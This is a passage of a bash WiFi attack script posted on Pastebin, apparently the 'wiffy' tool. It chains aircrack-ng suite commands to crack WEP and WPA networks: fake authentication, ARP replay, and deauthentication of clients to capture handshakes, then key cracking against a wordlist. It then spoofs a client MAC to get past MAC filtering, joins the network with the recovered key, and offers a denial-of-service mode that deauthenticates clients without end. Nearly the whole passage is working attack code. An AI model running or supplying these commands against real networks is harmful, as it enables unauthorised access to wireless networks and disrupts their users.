  580. action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $mac $monitorInterface" $verbose $diagnostics "true"
  581. #action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 30 -o 1 -q 10 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true"
  582. #if [Association successful] = then
  583. client=$mac
  584. sleep 1
  585. fi
  586. display action "Attack (ARPReplay+Deauth): $client" $diagnostics
  587. action "aireplay-ng (arpreplay)" "aireplay-ng --arpreplay -e \"$essid\" -b $bssid -h $client $monitorInterface" $verbose $diagnostics "true" "0|195|10" & # Don't wait, do the next command
  588. sleep 1
  589. action "aireplay-ng (deauth)" "aireplay-ng --deauth 5 -e \"$essid\" -a $bssid -c $fakeMac $monitorInterface" $verbose $diagnostics "true"
  590. sleep 1
  591. if [ "$client" == "$mac" ] ; then sleep 20 && action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true" ; fi
  592. sleep 60
  593.  
  594. #----------------------------------------------------------------------------------------------#
  595. elif [ "$encryption" == "WPA" ] ; then
  596. display action "Capturing: Handshake" $diagnostics
  597. loop="0" # 0 = first, 1 = client, 2 = everyone
  598. echo "g0tmi1k" > /tmp/wiffy.tmp
  599. for (( ; ; )) ; do
  600. action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w /tmp/wiffy.tmp -e \"$essid\" > /tmp/wiffy.handshake" $verbose $diagnostics "true"
  601. command=$(cat /tmp/wiffy.handshake | grep "Passphrase not in dictionary" ) #Got no data packets from client network & No valid WPA handshakes found
  602. if [ "$command" ] ; then break; fi
  603. sleep 2
  604. if [ "$loop" != "1" ] ; then
  605. if [ "$loop" != "0" ] ; then findClient $encryption ; fi
  606. sleep 1
  607. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): $client" $diagnostics ; fi
  608. action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid -c $client mon0" $verbose $diagnostics "true"
  609. loop="1"
  610. else
  611. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): *everyone*" $diagnostics ; fi
  612. action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid mon0" $verbose $diagnostics "true"
  613. loop="2"
  614. fi
  615. sleep 1
  616. done
  617. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Captured: Handshake" $diagnostics ; fi
  618. action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  619. fi
  620.  
  621. #----------------------------------------------------------------------------------------------#
  622. if [ "$encryption" == "WEP" ] || [ "$encryption" == "WPA" ] ; then
  623. display action "Starting: aircrack-ng" $diagnostics
  624. if [ "$encryption" == "WEP" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|350|30" ; fi
  625. if [ "$encryption" == "WPA" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w $wordlist -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|0|20" ; fi
  626. fi
  627.  
  628. #----------------------------------------------------------------------------------------------#
  629. action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  630. action "airmon-ng" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  631.  
  632. #----------------------------------------------------------------------------------------------#
  633. if [ -e "/tmp/wiffy.key" ] ; then
  634. key=$(cat /tmp/wiffy.key)
  635. display info "WiFi key: $key" $diagnostics
  636. #----------------------------------------------------------------------------------------------#
  637. if [ "$extras" == "true" ] ; then
  638. if [ "$client" != "$mac" ] ; then
  639. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Spoofing): $client ('Helps' with MAC filtering) " $diagnostics ; fi
  640. action "airmon-ng" "ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up" $verbose $diagnostics "true"
  641. fi
  642. display action "Joining: $essid" $diagnostics
  643. if [ "$encryption" == "WEP" ] ; then
  644. action "i[f/w]config" "ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up" $verbose $diagnostics "true"
  645. elif [ "$encryption" == "WPA" ] ; then
  646. action "wpa_passphrase" "wpa_passphrase $essid '$key' > /tmp/wiffy.conf" $verbose $diagnostics "true"
  647. action "wpa_supplicant" "wpa_supplicant -B -i $interface -c /tmp/wiffy.conf -D wext" $verbose $diagnostics "true"
  648. fi
  649. sleep 5
  650. action "dhclient" "dhclient $interface" $verbose $diagnostics "true"
  651. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  652. ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
  653. display info "IP: $ourIP" $diagnostics
  654. #gateway=$(route -n | grep $interface | awk '/^0.0.0.0/ {getline; print $2}')
  655. #display info "Gateway: $gateway" $diagnostics
  656. fi
  657. fi
  658. #----------------------------------------------------------------------------------------------#
  659. elif [ "$encryption" == "WPA" ] ; then
  660. display error "WiFi Key not in wordlist" $diagnostics 1>&2
  661. display action "Moving handshake: $(pwd)/wiffy-$essid.cap" $diagnostics 1>&2
  662. action "Moving capture" "mv -f /tmp/wiffy*.cap $(pwd)/wiffy-$essid.cap" $verbose $diagnostics "true"
  663. #----------------------------------------------------------------------------------------------#
  664. elif [ "$encryption" != "N/A" ] ; then
  665. display error "Something went wrong )=" $diagnostics 1>&2
  666. fi
  667.  
  668.  
  669. #----------------------------------------------------------------------------------------------#
  670. elif [ "$mode" == "dos" ] ; then
  671. display action "Attack (DOS): $essid" $diagnostics
  672. command="aireplay-ng --deauth 0 -e \"$essid\" -a $bssid"
  673. if [ "$client" != "clientless" ] ; then command="$command -c $client" ; fi
  674. command="$command $monitorInterface"
  675. action "aireplay-ng (DeAuth)" "$command" $verbose $diagnostics "true" &
  676.  
  677. #----------------------------------------------------------------------------------------------#
  678. display info "Attacking! ...press CTRL+C to stop" $diagnostics
  679. if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
  680. for (( ; ; )) ; do
  681. sleep 5
  682. done
  683. #elif [ "$mode" == "inject" ] ; then
  684. # display action "Attack (Inject): $essid" $diagnostics
  685. # if [ "$encryption" != "WEP" ] ; then display error "Only works on WEP networks" $diagnostics 1>&2 ; cleanup ; fi
  686.  
  687. #action "aireplay-ng (Inject)" "airtun-ng -a $bssid $monitorInterface" $verbose $diagnostics "true" &
  688. #action "aireplay-ng (Inject)" "ifconfig at0 192.168.1.83 netmask 255.255.255.0 up" $verbose $diagnostics "true" &
  689.  
  690. # airmon-ng start wlan0
  691. # /pentest/wireless/airpwn-1.4/airpwn -c conf/greet_html -d rt73 -i mon0 -v
  692.  
  693. #----------------------------------------------------------------------------------------------#
  694. # display info "Attacking! ...press CTRL+C to stop" $diagnostics
  695. # if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
  696. # for (( ; ; )) ; do
  697. # sleep 5
  698. # done
  699. fi
  700.  
  701. #----------------------------------------------------------------------------------------------#
  702. if [ "$diagnostics" == "true" ] ; then echo "-Done!---------------------------------------------------------------------------------------" >> $logFile ; fi
  703. cleanup clean
  704.  
  705.  
  706. #---Ideas--------------------------------------------------------------------------------------#
  707. # WEP - Chopchop/FagmentationAP Packet Broadcast
  708. # WPA - aircrack/coWPAtty
  709. # WPA - brute / hash
  710. # WPA - calculate hash
  711. # WPA - use pre hash / use pre capture
  712. # WPA - use folder for wordlist
  713. # WiFi Key is in hex
  714. # update - aircrack/coWPATTY
  715. # decrypt packets - offline & online (airtun-ng)
  716. # Mode - Injection - GET WORKING
  717. # display error "The encryption ($encryption) on $essid isn't support" $diagnostics 1>&2 ; cleanup
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!